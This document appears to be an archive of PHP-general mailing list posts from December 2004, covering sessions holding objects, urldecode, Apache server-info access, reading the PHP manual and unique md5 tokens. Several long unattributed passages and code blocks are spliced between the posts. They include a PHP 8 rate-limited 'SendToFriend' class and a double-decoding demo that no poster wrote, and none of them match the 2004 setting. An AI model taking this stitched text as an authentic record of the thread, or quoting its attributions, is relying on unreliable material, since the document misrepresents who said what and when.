LS6 3QS,  United Kingdom
Email: [EMAIL PROTECTED]
Tel: +44 113 283 2600 extn 4730  Fax:  +44 113 283 3211




Re: [PHP] MYSQL Query question

2004-12-09 Thread Raditha Dissanayake
Reinhart Viane wrote:
And a last question:
I always seem to get stuck on mysql queries when scripting. mysql.com
gives me a headache when searching something. Does someone know a good
mysql manual site or a good mysql book?
 

That does not mean mysql questions should be posted on php mailing lists.

STRICTLY PERSONAL AND CONFIDENTIAL 
This message may contain confidential and proprietary material for the
sole use of the intended 
recipient.  Any review or distribution by others is strictly prohibited.
If you are not the intended 
recipient please contact the sender and delete all copies.
 

Do you know that mailing lists are automatically archived at thousands 
of websites?


 


--
Raditha Dissanayake.
--
http://www.radinks.com/print/card-designer/ | Card Designer Applet
http://www.radinks.com/upload/  | Drag and Drop Upload 



RE: [PHP] MYSQL Query question

2004-12-09 Thread Reinhart Viane
First, since it was a combined question of php and mysql I thought of
sending it here.
Secondly, this is my standard footer.

My apologies if my question irritates you


-Original Message-
From: Raditha Dissanayake [mailto:[EMAIL PROTECTED] 
Sent: donderdag 9 december 2004 14:14
To: [EMAIL PROTECTED]
Subject: Re: [PHP] MYSQL Query question


>Reinhart Viane wrote:

>And a last question:
>I always seem to get stuck on mysql queries when scripting. mysql.com 
>gives me a headache when searching something. Does someone know a good 
>mysql manual site or a good mysql book?
>  
>
>That does not mean mysql questions should be posted on php mailing
lists.

> 
>
>
>STRICTLY PERSONAL AND CONFIDENTIAL
>This message may contain confidential and proprietary material for the
>sole use of the intended 
>recipient.  Any review or distribution by others is strictly
prohibited.
>If you are not the intended 
>recipient please contact the sender and delete all copies.
>  
>
>Do you know that mailing lists are automatically archived at thousands 
>of websites?



-- 
Raditha Dissanayake.
--
http://www.radinks.com/print/card-designer/ | Card Designer Applet
http://www.radinks.com/upload/  | Drag and Drop Upload 




RE: [PHP] Question: urldecode

2004-12-09 Thread Stuart Felenstein

--- "Ford, Mike" <[EMAIL PROTECTED]> wrote:

> Are you seeing the URL-encoded version *only* in
> your browser's
> Address/Location bar?  If so, that's perfectly
> normal and nothing to worry
> about -- it should be automatically decoded by the
> Web server before being
> passed to PHP.

> 
> If you're seeing the encoded version actually in
> your PHP script, that
> sounds like a major problem, possibly indicating a
> missing urldecode() or
> extraneous urlencode() -- in which case, please post
> a more detailed
> analysis of your problem, examples of the unwanted
> behaviour, and the
> relevant portions of script.
> 
I have no idea about what it means to see the encoded
version in my script. I have only one urldecode in the
script:



No urlencodes anywhere. 
I'll assume it's decoded properly before going to php
because the script runs fine.  I just know that I've
seen the hex's normally converted in the browser bar.

Further, I was assuming I should add the urldecode to
the query string.  As I had posted originally.  From
the example in the manual it appears I might to pass
the params through a urldecode counter loop.  

Lastly, I wasn't concerned about the hex code, but I
just made some reconnections of scripts.  Users can
save their search parameters.  I am saving the query
string.  Now I had this set up before and the way it
"was" working , is when the user wanted to view or
edit their saved searches, the search page would come
back with all the parameters filled in including
shaded parameters in things like mult select lists and
menu dropdowns.  It's not working that way now , so my
first suspicion is perhaps the hex is affecting it.

I can post more of the script if that makes sense.

Stuart




[PHP] Re: Objects and sessions

2004-12-09 Thread Shen Kong
Hi, your code may be this, you must use session_start() first:

<?php
session_start ();
class SessionTestC {
   protected $value;
   function __construct ( $val ) {
      $this->value = $val;
   }
   function GetValue () {
      return $this->value;
   }
}
if ( isset ($_SESSION['TestObj'])) {
   echo 'Session Test is set to: '.$_SESSION['TestObj']->GetValue().'';
} else {
   echo 'Session Test was not set.';
   $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
   echo "Click here.";
}
?>
Francisco M. Marzoa Alonso wrote:
Following code:

class SessionTestC {
   protected $value;
   function __construct ( $val ) {
   $this->value = $val;
   }
   function GetValue () {
   return $this->value;
   }
}
if ( isset ($_SESSION['TestObj'])) {
   echo 'Session Test is set to: '.$_SESSION['TestObj']->GetValue().'';
} else {
   session_start ();
   echo 'Session Test was not set.';
   $_SESSION['TestObj'] = new SessionTestC ( 'This is a test' );
   echo "Click here.";
}
?>
Gives me an error of incomplete object on second access, like this:

Fatal error: main() [function.main]: The script tried to 
execute a method or access a property of an incomplete object. Please 
ensure that the class definition "SessionTestC" of the object you are 
trying to operate on was loaded _before_ unserialize() gets called or 
provide a __autoload() function to load the class definition in 
/home/fmmarzoa/Develop/Stradivarius/Scripts/SessionTest.php on line 16

But as it can be seen, the class is defined in the script 
SessionTest.php itself, so... ??

--
-- ShenKong ([EMAIL PROTECTED])
-- http://www.openphp.cn

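The fix Francisco found (class definition before session_start(), session.auto_start off) and Shen Kong's reordered script, as an added example that is code from neither post: the class, or an autoloader that can load it, is registered before session_start() unserializes $_SESSION, and the script checks for __PHP_Incomplete_Class, the stand-in PHP substitutes when the class is still unknown at unserialize time, instead of calling a method on it and hitting the fatal error from the thread. The lib/ autoload directory is an assumption.

```php
<?php
// Added example, not code from the thread: make sure the class (or an
// autoloader for it) exists before the session is unserialized, and never
// call a method on an incomplete object. The lib/ directory is an assumption.

class SessionTestC {
    protected $value;
    public function __construct($val) {
        $this->value = $val;
    }
    public function GetValue() {
        return $this->value;
    }
}

// Classes that live in other files: register the autoloader before
// session_start(), so unserialize() can load them on demand. This only helps
// with session.auto_start=0; with auto_start=1 the session is unserialized
// before any line of this script has run.
spl_autoload_register(function ($class) {
    $file = __DIR__ . '/lib/' . basename(str_replace('\\', '/', $class)) . '.php';
    if (is_file($file)) {
        require $file;
    }
});

// Fetch an object from the session, or null when it is missing, of another
// class, or a __PHP_Incomplete_Class (what PHP stores when the class was
// unknown at unserialize time). An unusable value is dropped rather than used.
function session_object($key, $class) {
    if (!isset($_SESSION[$key])) {
        return null;
    }
    $obj = $_SESSION[$key];
    if ($obj instanceof __PHP_Incomplete_Class || !($obj instanceof $class)) {
        unset($_SESSION[$key]);
        return null;
    }
    return $obj;
}

session_start();   // after the class definition and the autoloader

$test = session_object('TestObj', 'SessionTestC');
if ($test !== null) {
    echo 'Session Test is set to: ' . htmlspecialchars($test->GetValue(), ENT_QUOTES, 'UTF-8');
} else {
    echo 'Session Test was not set.';
    $_SESSION['TestObj'] = new SessionTestC('This is a test');
}
```

The class check in session_object() also covers a session written by an older version of the script that stored a different class under the same key: the value is discarded and rebuilt instead of being used as if it were the expected type.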

[PHP] a question about the PHP manual

2004-12-09 Thread Eakin, W
Hello,
   As I'm studying, and learning, PHP, I use certain resources again 
and again. A few books I've bought, some web sites, this mailing list, 
and the PHP manual. I've taken the often repeated 'RTFM' to heart, and I 
attempt to google or RTFM before considering a post to the list with a 
question, but now I have a question about the manual itself.
I've noticed that most of the replies to the questions on this list, 
when they refer to a part of the manual,  point to the same few sections 
over and over. Such as arrays, strings, sessions, objects, and a few others.
My question is this: when I'm reading the manual, is it just that I should 
be concentrating on a few sections (and if so, which?), or should I be 
giving equal attention to all the sections, including some (I suppose) I 
might never use?

Thoughts?
thanks,
William


[PHP] Re: Installing Apache and PHP from scratch

2004-12-09 Thread Don
> Hi,
>  
> Have been using RedHat and Fedora Systems.  When I install the OS, Apache
> is
> usually installed already and I download PHP and install manually.  I'd
> like
> to install Apache itself but not sure what configuration to use.  Is there
> a command similar to the phpinfo() command that can tell me how an already
> installed Apache in configured?

Enable server-info in your httpd.conf and be amazed at the amount of
information http://localhost/server-info will chuck at you.


 
How exactly does this work?
 
1. In my httpd.conf file, I uncommented the following lines:

<Location /server-info>
    SetHandler server-info
    Order deny,allow
    Deny from all
    Allow from .lclnav.com
</Location>

 
2.  I then restarted my apache server
 
3.  I then type in the location bar: http://www.lclnav.com/server-info
 
I get (doesn't work):
 
"Forbidden
You don't have permission to access /server-info on this server."
 
Note: I created the directory 'server-info' off of the directory root after
the error; still errors

---
Outgoing mail is certified Virus Free.
Checked by AVG anti-virus system (http://www.grisoft.com).
Version: 6.0.807 / Virus Database: 549 - Release Date: 12/7/2004
 




RE: [PHP] Question: urldecode

2004-12-09 Thread Ford, Mike



> -Original Message-
> From: Stuart Felenstein [mailto:[EMAIL PROTECTED] 
> Sent: 09 December 2004 13:38
> 
> --- "Ford, Mike" <[EMAIL PROTECTED]> wrote:
> 
> > Are you seeing the URL-encoded version *only* in
> > your browser's
> > Address/Location bar?  If so, that's perfectly
> > normal and nothing to worry
> > about -- it should be automatically decoded by the
> > Web server before being
> > passed to PHP.
> 
> > 
> > If you're seeing the encoded version actually in
> > your PHP script, that
> > sounds like a major problem, possibly indicating a
> > missing urldecode() or
> > extraneous urlencode() -- in which case, please post
> > a more detailed
> > analysis of your problem, examples of the unwanted
> > behaviour, and the
> > relevant portions of script.
> > 
> I have no idea about what it means to see the encoded
> version in my script. I have only one urldecode in the
> script:
> 
> 

I actually doubt whether you even need this urldecode() -- but it depends
where that value is coming from.

> Further, I was assuming I should add the urldecode to
> the query string.

I don't quite understand this -- if you mean the query string supplied to
your script and manifesting in your $_GET array, then no, very unlikely,
since this should have been taken care of by the Web server before it gets
anywhere near PHP.  If you're referring to echoing out URLs with query
strings on them, then that is one of the few instances where urlENcode()
might be necessary, but definitely not urlDEcode().

> Lastly, I wasn't concerned about the hex code, but I
> just made some reconnections of scripts.  Users can
> save their search parameters.  I am saving the query
> string.  Now I had this set up before and the way it
> "was" working , is when the user wanted to view or
> edit their saved searches, the search page would come
> back with all the parameters filled in including
> shaded parameters in things like mult select lists and
> menu dropdowns.  It's not working that way now , so my
> first suspicion is perhaps the hex is affecting it.

All I can say to this is to re-iterate the point that your Web server should
be decoding those %xx values before your script ever gets to see them.  You
*may* have to urlencode() values you write out that might one day form part
of a clickable link -- but, because of the previous sentence, you should not
yourself need to do the compensating urldecode() in the target script.

Once again, this sounds like a situation where you need to be echoing out
everything and anything of even the slightest relevance at the crucial spots
of your script -- in the debugging phase, my scripts often have a bunch of
debugging echoes every few lines, and some sections even end up with more
temporary echoes than actual script!  It's tedious wading your way through
the screenfuls of output, but can be exceedingly illuminating of an elusive
problem.

Cheers!

Mike

-
Mike Ford,  Electronic Information Services Adviser,
Learning Support Services, Learning & Information Services, JG125, James
Graham Building, Leeds Metropolitan University, Headingley Campus, LEEDS,
LS6 3QS,  United Kingdom
Email: [EMAIL PROTECTED]
Tel: +44 113 283 2600 extn 4730  Fax:  +44 113 283 3211
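An added illustration of Mike's point (editor-supplied example code, not from the thread): it builds a saved-search link with http_build_query(), uses parse_str() to stand in for the decoding the web server/SAPI does before $_GET is populated, and shows what a second urldecode() does to a value that legitimately contains "+". The parameter names are the ones from the thread; the values, choice list and script name are constructed.

```php
<?php
// Added example, not code from the thread. It shows the one place URL
// encoding belongs (building a link) and demonstrates that the values PHP
// puts in $_GET are already decoded, so a "compensating" urldecode() in the
// target script corrupts data. parse_str() stands in for what the web
// server/SAPI does with QUERY_STRING; parameter names come from the thread,
// the values are constructed.

// Encode exactly once: when a value is written into a URL.
function buildSearchUrl(string $script, array $params): string
{
    // http_build_query() percent-encodes keys and values, including the
    // brackets of array parameters, which is where "%5B%5D" comes from.
    return $script . '?' . http_build_query($params);
}

// What your script sees in $_GET for that link: decoded once, by PHP.
function simulateGet(string $url): array
{
    $query = (string) parse_url($url, PHP_URL_QUERY);
    parse_str($query, $get);
    return $get;
}

// Re-populate a multi-select from the decoded values. This is the "magic
// hands": the form page reads $_GET and marks matching options selected.
// The output is HTML, so the escaping needed here is htmlspecialchars(),
// not urlencode() and certainly not urldecode().
function renderOptions(array $choices, array $selected): string
{
    $html = '';
    foreach ($choices as $id => $label) {
        $sel   = in_array((string) $id, $selected, true) ? ' selected="selected"' : '';
        $html .= sprintf('<option value="%s"%s>%s</option>' . "\n",
            htmlspecialchars((string) $id, ENT_QUOTES, 'UTF-8'),
            $sel,
            htmlspecialchars($label, ENT_QUOTES, 'UTF-8'));
    }
    return $html;
}

$url = buildSearchUrl('LFWSearch.php', [
    's_Industry'     => ['2', '3'],
    's_LocationCity' => 'Bronx',
    's_JobTitle'     => 'C++ developer',   // constructed: contains a reserved character
]);
echo $url, "\n";

$get = simulateGet($url);
echo $get['s_JobTitle'], "\n";             // decoded once by PHP: correct
echo urldecode($get['s_JobTitle']), "\n";  // decoded a second time: the pluses become spaces

// Constructed choice list for the industry multi-select.
$industries = ['1' => 'Finance', '2' => 'Health', '3' => 'Software'];
echo renderOptions($industries, $get['s_Industry'] ?? []);
```

Run it with php from the command line. The link comes out with the [] encoded as %5B%5D, $get['s_Industry'] is already the array ['2', '3'], and urldecode() applied to the already-decoded "C++ developer" turns the pluses into spaces. Double decoding is also how input filters get bypassed: whatever validation ran on the once-decoded value never saw the string the second decode produces. Decode exactly once, at the boundary, and encode on output (urlencode() into URLs, htmlspecialchars() into HTML).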




Re: [PHP] MYSQL Query question

2004-12-09 Thread John Nichel
Raditha Dissanayake wrote:
Reinhart Viane wrote:
And a last question:
I always seem to get stuck on mysql queries when scripting. mysql.com
gives me a headache when searching something. Does someone know a good
mysql manual site or a good mysql book?
 

That does not mean mysql questions should be posted on php mailing lists.

There you go again, trying to keep this list on topic. ;)
--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]


Re: [PHP] Re: Installing Apache and PHP from scratch

2004-12-09 Thread Jason Wong
On Thursday 09 December 2004 22:12, Don wrote:

> 1. In my httpd.conf file, I uncommented the following lines:
> 
> SetHandler server-info
> Order deny,allow
> Deny from all
> Allow from .lclnav.com
> 

That "Allow from ..." has to specify an IP address / network range / domain 
(etc) that will allow your *client* to connect.

If you have shell access on the server and you have lynx/links/elinks 
installed then you should probably only "Allow from 127.0.0.1" and just 
access it directly from the server rather than through a remote client.

> Note: I created the directory 'server-info' off of the directory root after
> the error; still errors

You don't need to create any directories for the above to work.

As this is not PHP-related if you need more info refer to the Apache docs 
and/or ask on the Apache mailing list.


-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
BOFH Excuse #116:

the real ttys became pseudo ttys and vice-versa.
*/




Re: [PHP] a question about the PHP manual

2004-12-09 Thread Miles Thompson
At 09:56 AM 12/9/2004, Eakin, W wrote:
Hello,
   As I'm studying, and learning, PHP, I use certain resources again and 
again. A few books I've bought, some web sites, this mailing list, and 
the PHP manual. I've taken the often repeated 'RTFM' to heart, and I 
attempt to google or RTFM before considering a post to the list with a 
question, but now I have a question about the manual itself.
I've noticed that most of the replies to the questions on this list, when 
they refer to a part of the manual,  point to the same few sections over 
and over. Such as arrays, strings, sessions, objects, and a few others.
My question is this, when I'm reading the manual, is just that I should be 
concentrating on a few sections (and if so, which?), or should I be giving 
equal attention to all the sections, including some (I suppose) I might 
never use.

Thoughts?
thanks,
William

Well, those are commonly used parts of the language, along with control 
structures (IF, WHILE, CASE).

Once PHP is installed, familiarity with Chapters 10 through 42 would 
furnish a really solid grounding.

Then I'd look at the function list and focus on the functions applicable to 
your particular database and the error handling and logging functions.

After that, it depends on your programming experience, as how one thinks in 
language "a" may be subtly different language "b". Note that there are both 
directory and file system functions; the separation is logical, but sent me 
on a worried hunt a couple of years ago. Thus we reach the land of "it 
depends on what you want or have to do".

In closing, I'd recommend writing little test scripts so that you can do 
two things:
1. Figure out how to use the various functions and how they behave.
2. Then intentionally break them - knowledge of this behaviour can 
be just as important.

Alternately, like many, dig out the info as it's needed. The problem with 
this approach is missing out on new and better ways of doing things, and 
you don't enrich your toolkit. As for "some (I suppose) I might never use" 
- just how much time do you WANT to spend with your computer? How do the 
others in your life feel about that?

Cheers - Miles


Re: [PHP] a question about the PHP manual

2004-12-09 Thread Ron Clark


At 09:56 AM 12/9/2004, Eakin, W wrote:
>Hello,
>As I'm studying, and learning, PHP, I use certain resources again and
> again. A few books I've bought, some web sites, this mailing list, and
> the PHP manual. I've taken the often repeated 'RTFM' to heart, and I
> attempt to google or RTFM before considering a post to the list with a
> question, but now I have a question about the manual itself.
>I've noticed that most of the replies to the questions on this list, when
>they refer to a part of the manual,  point to the same few sections over
>and over. Such as arrays, strings, sessions, objects, and a few others.
>My question is this, when I'm reading the manual, is just that I should be
>concentrating on a few sections (and if so, which?), or should I be giving
>equal attention to all the sections, including some (I suppose) I might
>never use.

I have found that when learning a new language that it is a good idea to
read the whole manual if time permits, even if there are sections that you
don't think you will ever need. Later on when programming you may need to
do something and remember that function that you never thought you would
need. It never hurts to know what's available even if you don't think you
will need it.

Ron Clark
System Administrator
Armstrong Atlantic State University




Re: [PHP] a question about the PHP manual

2004-12-09 Thread Nick Talbott
On Thursday 09 December 2004 1:56 pm, Eakin, W wrote:
> I've noticed that most of the replies to the questions on this list,
> when they refer to a part of the manual,  point to the same few sections
> over and over. Such as arrays, strings, sessions, objects, and a few
> others. My question is this, when I'm reading the manual, is just that I
> should be concentrating on a few sections (and if so, which?), or should I
> be giving equal attention to all the sections, including some (I suppose) I
> might never use.

Here's a suggestion...

Go through Section III on Language Reference thoroughly.  You'll need to 
understand pretty much all of this.

Skim through sections IV and V (Security and Features) so you know what's there 
and come back to them before you use PHP in a real application (specially the 
Security section!)

In the function reference, look in detail at the following sections:
- Array functions
- Date and Time functions
- Directory Functions
- Filesystem functions
- String Functions
- Variable Functions
- plus the specific section for the database you want to use
The above are all pretty common requirements in most PHP applications.

Then skim through the following sections and come back to them when you need to 
use them:
- Error Handling and Logging Functions
- HTTP Functions
- Miscellaneous Functions
- Network Functions
- Regular Expression Functions

Then dig into the other sections in the function reference that interest you.

My 2p

- Nick


-- 
Nick Talbott, Powys County Council, UK
IT Policy and Strategy Manager/Rheolwr Polisi a Chynllunio TGCh

email: [EMAIL PROTECTED]
fax:   01597 824781
web:   www.powys.gov.uk




RE: [PHP] Question:maybe urldecode

2004-12-09 Thread Stuart Felenstein

--- "Ford, Mike" <[EMAIL PROTECTED]> wrote:

> > Lastly, I wasn't concerned about the hex code, but
> I just made some reconnections of scripts.  Users
> can save their search parameters.  I am saving the
> query string.  Now I had this set up before and the 
> way it "was" working , is when the user wanted to   
> view or edit their saved searches, the search page  
> would come back with all the parameters filled in   
> including shaded parameters in things like multi
> select lists and menu dropdowns.  It's not working  
> that way now so my first suspicion is perhaps the
> hex is affecting it.


I'm not sure if this particular is a matter of
debugging.  There is a different behaviour going on
and now I'm not sure if it would have anything to with
the hex.  The textfields in the query string are just
the variable name = value.  

Basically I'm throwing this out though since I'm
wondering if there is something that should be in the
search script , that when I apply a query string to it
would fill in the field (like magic hands)

As an example, if you click on the link , you'll see
industry has 2 choices selected , and city has a
value.
Now I can't reproduce this with my new script.

http://www.lurkingforwork.com/LFWSearch.php?s_Industry[]=2&s_Industry[]=3&s_LocationCity=Bronx&s_JobTitle=&s_PostStart=&VendorJobsPageSize=


Stuart




Re: [PHP] MYSQL Query question

2004-12-09 Thread Raditha Dissanayake
John Nichel wrote:
Raditha Dissanayake wrote:
Reinhart Viane wrote:
And a last question:
I always seem to get stuck on mysql queries when scripting. mysql.com
gives me a headache when searching something. Does someone know a good
mysql manual site or a good mysql book?
 

That does not mean mysql questions should be posted on php mailing 
lists.

There you go again, trying to keep this list on topic. ;)
Alright, I am going to change. As they say, if you can't beat them, join them.
obligatory off topic post:
Do you think it's better to use innodb type tables or myisam type tables 
when using mysql even without  foreign keys?

--
Raditha Dissanayake.
--
http://www.radinks.com/print/card-designer/ | Card Designer Applet
http://www.radinks.com/upload/  | Drag and Drop Upload 



[PHP] Finding the location of an included script

2004-12-09 Thread Gadi Cohen
Is this possible?

I'm trying to write a back end to be used in most of my websites.

While I can simply use symlinks to ensure this is included from my
various sites but only exists once on the hard drive, I'd prefer to simply
include the file and have the script itself work out where it lives.

So if I have:  include("/path/to/backend.php");

Is there a way from inside of backend.php to return "/path/to" ?

Gadi




Re: [PHP] Question:maybe urldecode

2004-12-09 Thread Jason Wong
On Thursday 09 December 2004 23:16, Stuart Felenstein wrote:

> I'm not sure if this particular is a matter of
> debugging. 

Your program doesn't work the way you intended it? So if you don't debug it, 
how is it going to get from a "not working as intended" state, to a working 
state?

> There is a different behaviour going on 
> and now I'm not sure if it would have anything to with
> the hex.  The textfields in the query string are just
> the variable name = value.

So what do the variables contain at each stage? Where do they change from 
"what you expected" to "not what you expected"?.

> Basically I'm throwing this out though since I'm
> wondering if there is something that should be in the
> search script , that when I apply a query string to it
> would fill in the field (like magic hands)

Yeah I wish I had some magic hands that writes my programs for me too. 
Sadly ...

-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
The days are all empty and the nights are unreal.
*/




Re: [PHP] Question:maybe urldecode

2004-12-09 Thread Stuart Felenstein

--- Jason Wong <[EMAIL PROTECTED]> wrote:

> > Basically I'm throwing this out though since I'm
> > wondering if there is something that should be in
> the
> > search script , that when I apply a query string
> to it
> > would fill in the field (like magic hands)
> 
> Yeah I wish I had some magic hands that writes my
> programs for me too. 
> Sadly ...
> 
Jason, I don't think you read or understood my
question. As I said, it doesn't seem to be a debugging
scenario. I was asking if anyone would know a
reason why on one page, one could apply the query
string to a URL and the page would be filled in and on
another page it doesn't work.  Please don't imply I'm
looking for someone to write my programs. The magic
hands was a reference to how the boxes are filled in
by placing the string in.

Stuart  




[PHP] Re: Finding the location of an included script

2004-12-09 Thread Ben Ramsey
Gadi Cohen wrote:
So if I have:  include("/path/to/backend.php");
Is there a way from inside of backend.php to return "/path/to" ?
Check out the filesystem functions in the PHP manual. You're probably 
particularly interested in pathinfo()

http://www.php.net/pathinfo
--
Ben Ramsey
Zend Certified Engineer
http://benramsey.com
---
Atlanta PHP - http://www.atlphp.org/
The Southeast's premier PHP community.
---


Re: [PHP] a question about the PHP manual

2004-12-09 Thread Richard Lynch
Eakin, W wrote:
> Hello,
> As I'm studying, and learning, PHP, I use certain resources again
> and again. A few books I've bought, some web sites, this mailing list,
> and the PHP manual. I've taken the often repeated 'RTFM' to heart, and I
> attempt to google or RTFM before considering a post to the list with a
> question, but now I have a question about the manual itself.
> I've noticed that most of the replies to the questions on this list,
> when they refer to a part of the manual,  point to the same few sections
> over and over. Such as arrays, strings, sessions, objects, and a few
> others.
> My question is this, when I'm reading the manual, is just that I should
> be concentrating on a few sections (and if so, which?), or should I be
> giving equal attention to all the sections, including some (I suppose) I
> might never use.

I would recommend reading EVERYTHING in the PHP manual UP TO
"Section VI: Function Reference"

All of that stuff is what defines the core PHP Language, and if you don't
know it, you're going to waste a lot of time on Voodoo Programming.

Voodoo Programming: You do things that "work" but you have completely
erroneous beliefs about *why* and *how* they work.

If you know the jargon for what you are looking for, Google is your buddy;
But if you don't, and can only describe what you want in a paragraph of a
question, then re-read all of that, plus the FAQs.

You then want to skim through the main page of each "function reference"
section.  Currently that's 135 (!) pages.  Some of them you can quickly
dismiss as "irrelevant for all time to me" :-)  Others, you'll find out
that there's an entire science to something you thought you'd have to
invent for yourself.

Yes, that's a lot of reading.

No, you won't remember all of it.

Hell, you might not even understand all of it when you read it.

Once upon a time, I even posted an FAQ to the list, way back when, because
while I had *read* the FAQ initially, there were FAQs I didn't even
understand the Question to, much less the Answer.

Six months later, of course, I ran into the question in my own needs, and,
well, didn't *RE*-read the FAQ.

Take note of the stuff you don't understand at all, and try to memorize
the buzz-words or what you think they might be all about.

The hair you save may be your own. :-)

-- 
Like Music?
http://l-i-e.com/artists.htm




Re: [PHP] best practice question..

2004-12-09 Thread Richard Lynch
Guy Bowden wrote:
> On this note - what is considered "best practice" in a - sent to friend
> type thing.
>
> i.e. User inputs their name + message + email + friends email into a
> html/flash form
>
> friend gets a link to read the message.
>
> currently I do this:
>
> 1 collect form input
> 2 create hash using the md5/uniqid method : $hash = md5(uniqid($key));
> 3 input data to database table using the hash as the primary key value
> 4 send email to friend with link containing the hash
> 5 user clicks on link
> 6 hash read in from the $_GET object
> 7 hash used to select message details from DB and displayed to the user
>
> There's never a security issue here - i.e. i don't mind how many times /
> who reads the message, but just want to make it hard to just guess keys
> to read other messages (otherwise it would just be the db id)
>
> This method works for me, but is it the *right* way?

I would also:

Track the sender IP address, and only allow N sends per time period T.
Track the recipient email, and only allow M "To:"s per time period U.

The point being to stop spammers from using your system to spam the world,
or target specific victims.

Is $key the ID in the database?  You may want to consider adding in "more"
randomness with mt_rand() as the manual suggests on the uniqid page -- You
can still keep $key as part of the hash by doing:
md5(uniqid("$key|" . mt_rand(), true))

Certainly sending the md5/uniquid as the only thing exposed is about as
good as you can get for making sure that the other email URLs are
guessable -- You do run the risk that sooner or later your md5/uniquid
hash will "collide" with two emails on the same value.  Easy enough to
check the db and generate another hash if they do collide, so I'd add that
in if you don't have it.  Add a line after your md5(...) call and set
$hash = '42' for testing purpose, then comment it out to go back to
reality.

You could look into the larger bits and longer hashes that would be
"better" but I really don't think that's necessary, imho.

-- 
Like Music?
http://l-i-e.com/artists.htm




Re: [PHP] duplicate md5 hash's

2004-12-09 Thread Richard Lynch
>> GB> Is there any way that the same hash could have been generated more
>> than
>> GB> once?
>>
>> It's extremely unlikely (I cannot give you any stats as to how
>> unlikely though, sorry).

As I understand it (or don't, rather) the odds are one in 2,147,...,... (2
billion)

But that's only in theory.

In practice, I think people have demonstrated that it's not really 1 in 2
billion.

It's still damned unlikely, but making *SURE* with the loop you've got is
cheap and easy, so I'd stick with that.

-- 
Like Music?
http://l-i-e.com/artists.htm
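An added example, not code from either thread, that puts Richard's two suggestions together: the salted uniqid()/md5() token from his reply to Guy in the "best practice" thread, the retry-on-collision loop discussed in this duplicate-hash thread, and per-sender-IP / per-recipient send limits. Arrays stand in for the database tables; the class name, limits and timestamps are constructed; it assumes PHP 8 for named arguments and constructor promotion.

```php
<?php
// Added example, not code from the threads. In-memory arrays stand in for
// the database tables; replace them with INSERT / SELECT COUNT(*) queries.
// Limits, window and timestamps are constructed sample numbers.

class SendToFriend
{
    private array $messages = [];   // token => message row (table keyed by the hash)
    private array $sendLog  = [];   // list of [senderIp, recipient, time]

    public function __construct(
        private int $maxPerSender    = 5,     // N sends per window per IP
        private int $maxPerRecipient = 3,     // M messages per window per "To:" address
        private int $window          = 3600,  // T / U, in seconds
    ) {}

    // The thread's construction: uniqid() salted with the caller's key and
    // mt_rand(), run through md5(); true asks uniqid() for extra entropy.
    // On PHP 7+, bin2hex(random_bytes(16)) is the stronger choice.
    public static function newToken(string $key): string
    {
        return md5(uniqid($key . '|' . mt_rand(), true));
    }

    // Collision check: regenerate until the token is not already a key.
    // Bounding the loop turns a broken RNG into an error instead of a hang.
    private function uniqueToken(string $key): string
    {
        for ($i = 0; $i < 10; $i++) {
            $token = self::newToken($key);
            if (!isset($this->messages[$token])) {
                return $token;
            }
        }
        throw new RuntimeException('could not generate a unique token');
    }

    // Count log entries inside the window that satisfy $match.
    private function countRecent(callable $match, int $now): int
    {
        $n = 0;
        foreach ($this->sendLog as [$ip, $to, $t]) {
            if ($t > $now - $this->window && $match($ip, $to)) {
                $n++;
            }
        }
        return $n;
    }

    // Returns the token on success, or null when a limit is hit. The null
    // path is where abuse becomes visible, so log it in a real deployment.
    public function submit(string $senderIp, string $recipient, string $message, ?int $now = null): ?string
    {
        $now ??= time();
        $recipient = strtolower(trim($recipient));

        if ($this->countRecent(fn($ip, $to) => $ip === $senderIp, $now) >= $this->maxPerSender) {
            return null;
        }
        if ($this->countRecent(fn($ip, $to) => $to === $recipient, $now) >= $this->maxPerRecipient) {
            return null;
        }

        $token = $this->uniqueToken($senderIp . $recipient);
        $this->messages[$token] = ['to' => $recipient, 'body' => $message, 'sent' => $now];
        $this->sendLog[]        = [$senderIp, $recipient, $now];
        return $token;
    }

    // The link handler: look up by the token from $_GET, nothing else.
    public function fetch(string $token): ?array
    {
        // An md5 hex digest is exactly 32 hex characters; anything else
        // is rejected before it gets anywhere near the store or a query.
        if (!preg_match('/^[0-9a-f]{32}$/', $token)) {
            return null;
        }
        return $this->messages[$token] ?? null;
    }
}

$svc = new SendToFriend(maxPerSender: 2, maxPerRecipient: 1, window: 3600);
$t0  = 1_102_550_400;  // constructed timestamp

$a = $svc->submit('192.0.2.10', 'friend@example.com', 'hello', $t0);        // accepted
$b = $svc->submit('192.0.2.10', 'friend@example.com', 'again', $t0);        // refused: recipient limit
$c = $svc->submit('192.0.2.10', 'other@example.com', 'hi', $t0);            // accepted: 2nd from this IP
$d = $svc->submit('192.0.2.10', 'third@example.com', 'hi', $t0);            // refused: sender limit
$e = $svc->submit('192.0.2.10', 'third@example.com', 'hi', $t0 + 3601);     // accepted: window expired

var_dump($a !== null, $b === null, $c !== null, $d === null, $e !== null);
var_dump($svc->fetch($a)['body'] === 'hello');
var_dump($svc->fetch('42') === null);   // Richard's test value never reaches the lookup
```

In the real thing the collision check is an INSERT into a table whose primary key is the token (let the duplicate-key error drive the retry rather than a SELECT followed by an INSERT, which races), the send log is a table you can also alert on, and on PHP 7+ bin2hex(random_bytes(16)) gives a token that is unguessable by construction rather than by md5() of something merely unique. The 32-hex-character check in fetch() means a malformed value from $_GET is dropped before any query is built.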




RE: [PHP] a question about the PHP manual

2004-12-09 Thread Justin Palmer
Hi,

Richard is spot on, but learning (PHP, ASP, Java, ...) programming is
not all about reading.  Set up small examples that better enforce the
ideas in your mind about specific topics that you are having a hard time
with.  You will lose, roughly, 90% of the information by just reading.
Examples help solidify the theories.

Regards,

Justin Palmer
__
KISS (Keep It Simple, SEARCH)!
Google::getUri( http://www.google.com );
Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );



-Original Message-
From: Richard Lynch [mailto:[EMAIL PROTECTED] 
Sent: Thursday, December 09, 2004 9:15 AM
To: Eakin, W
Cc: [EMAIL PROTECTED]
Subject: Re: [PHP] a question about the PHP manual


Eakin, W wrote:
> Hello,
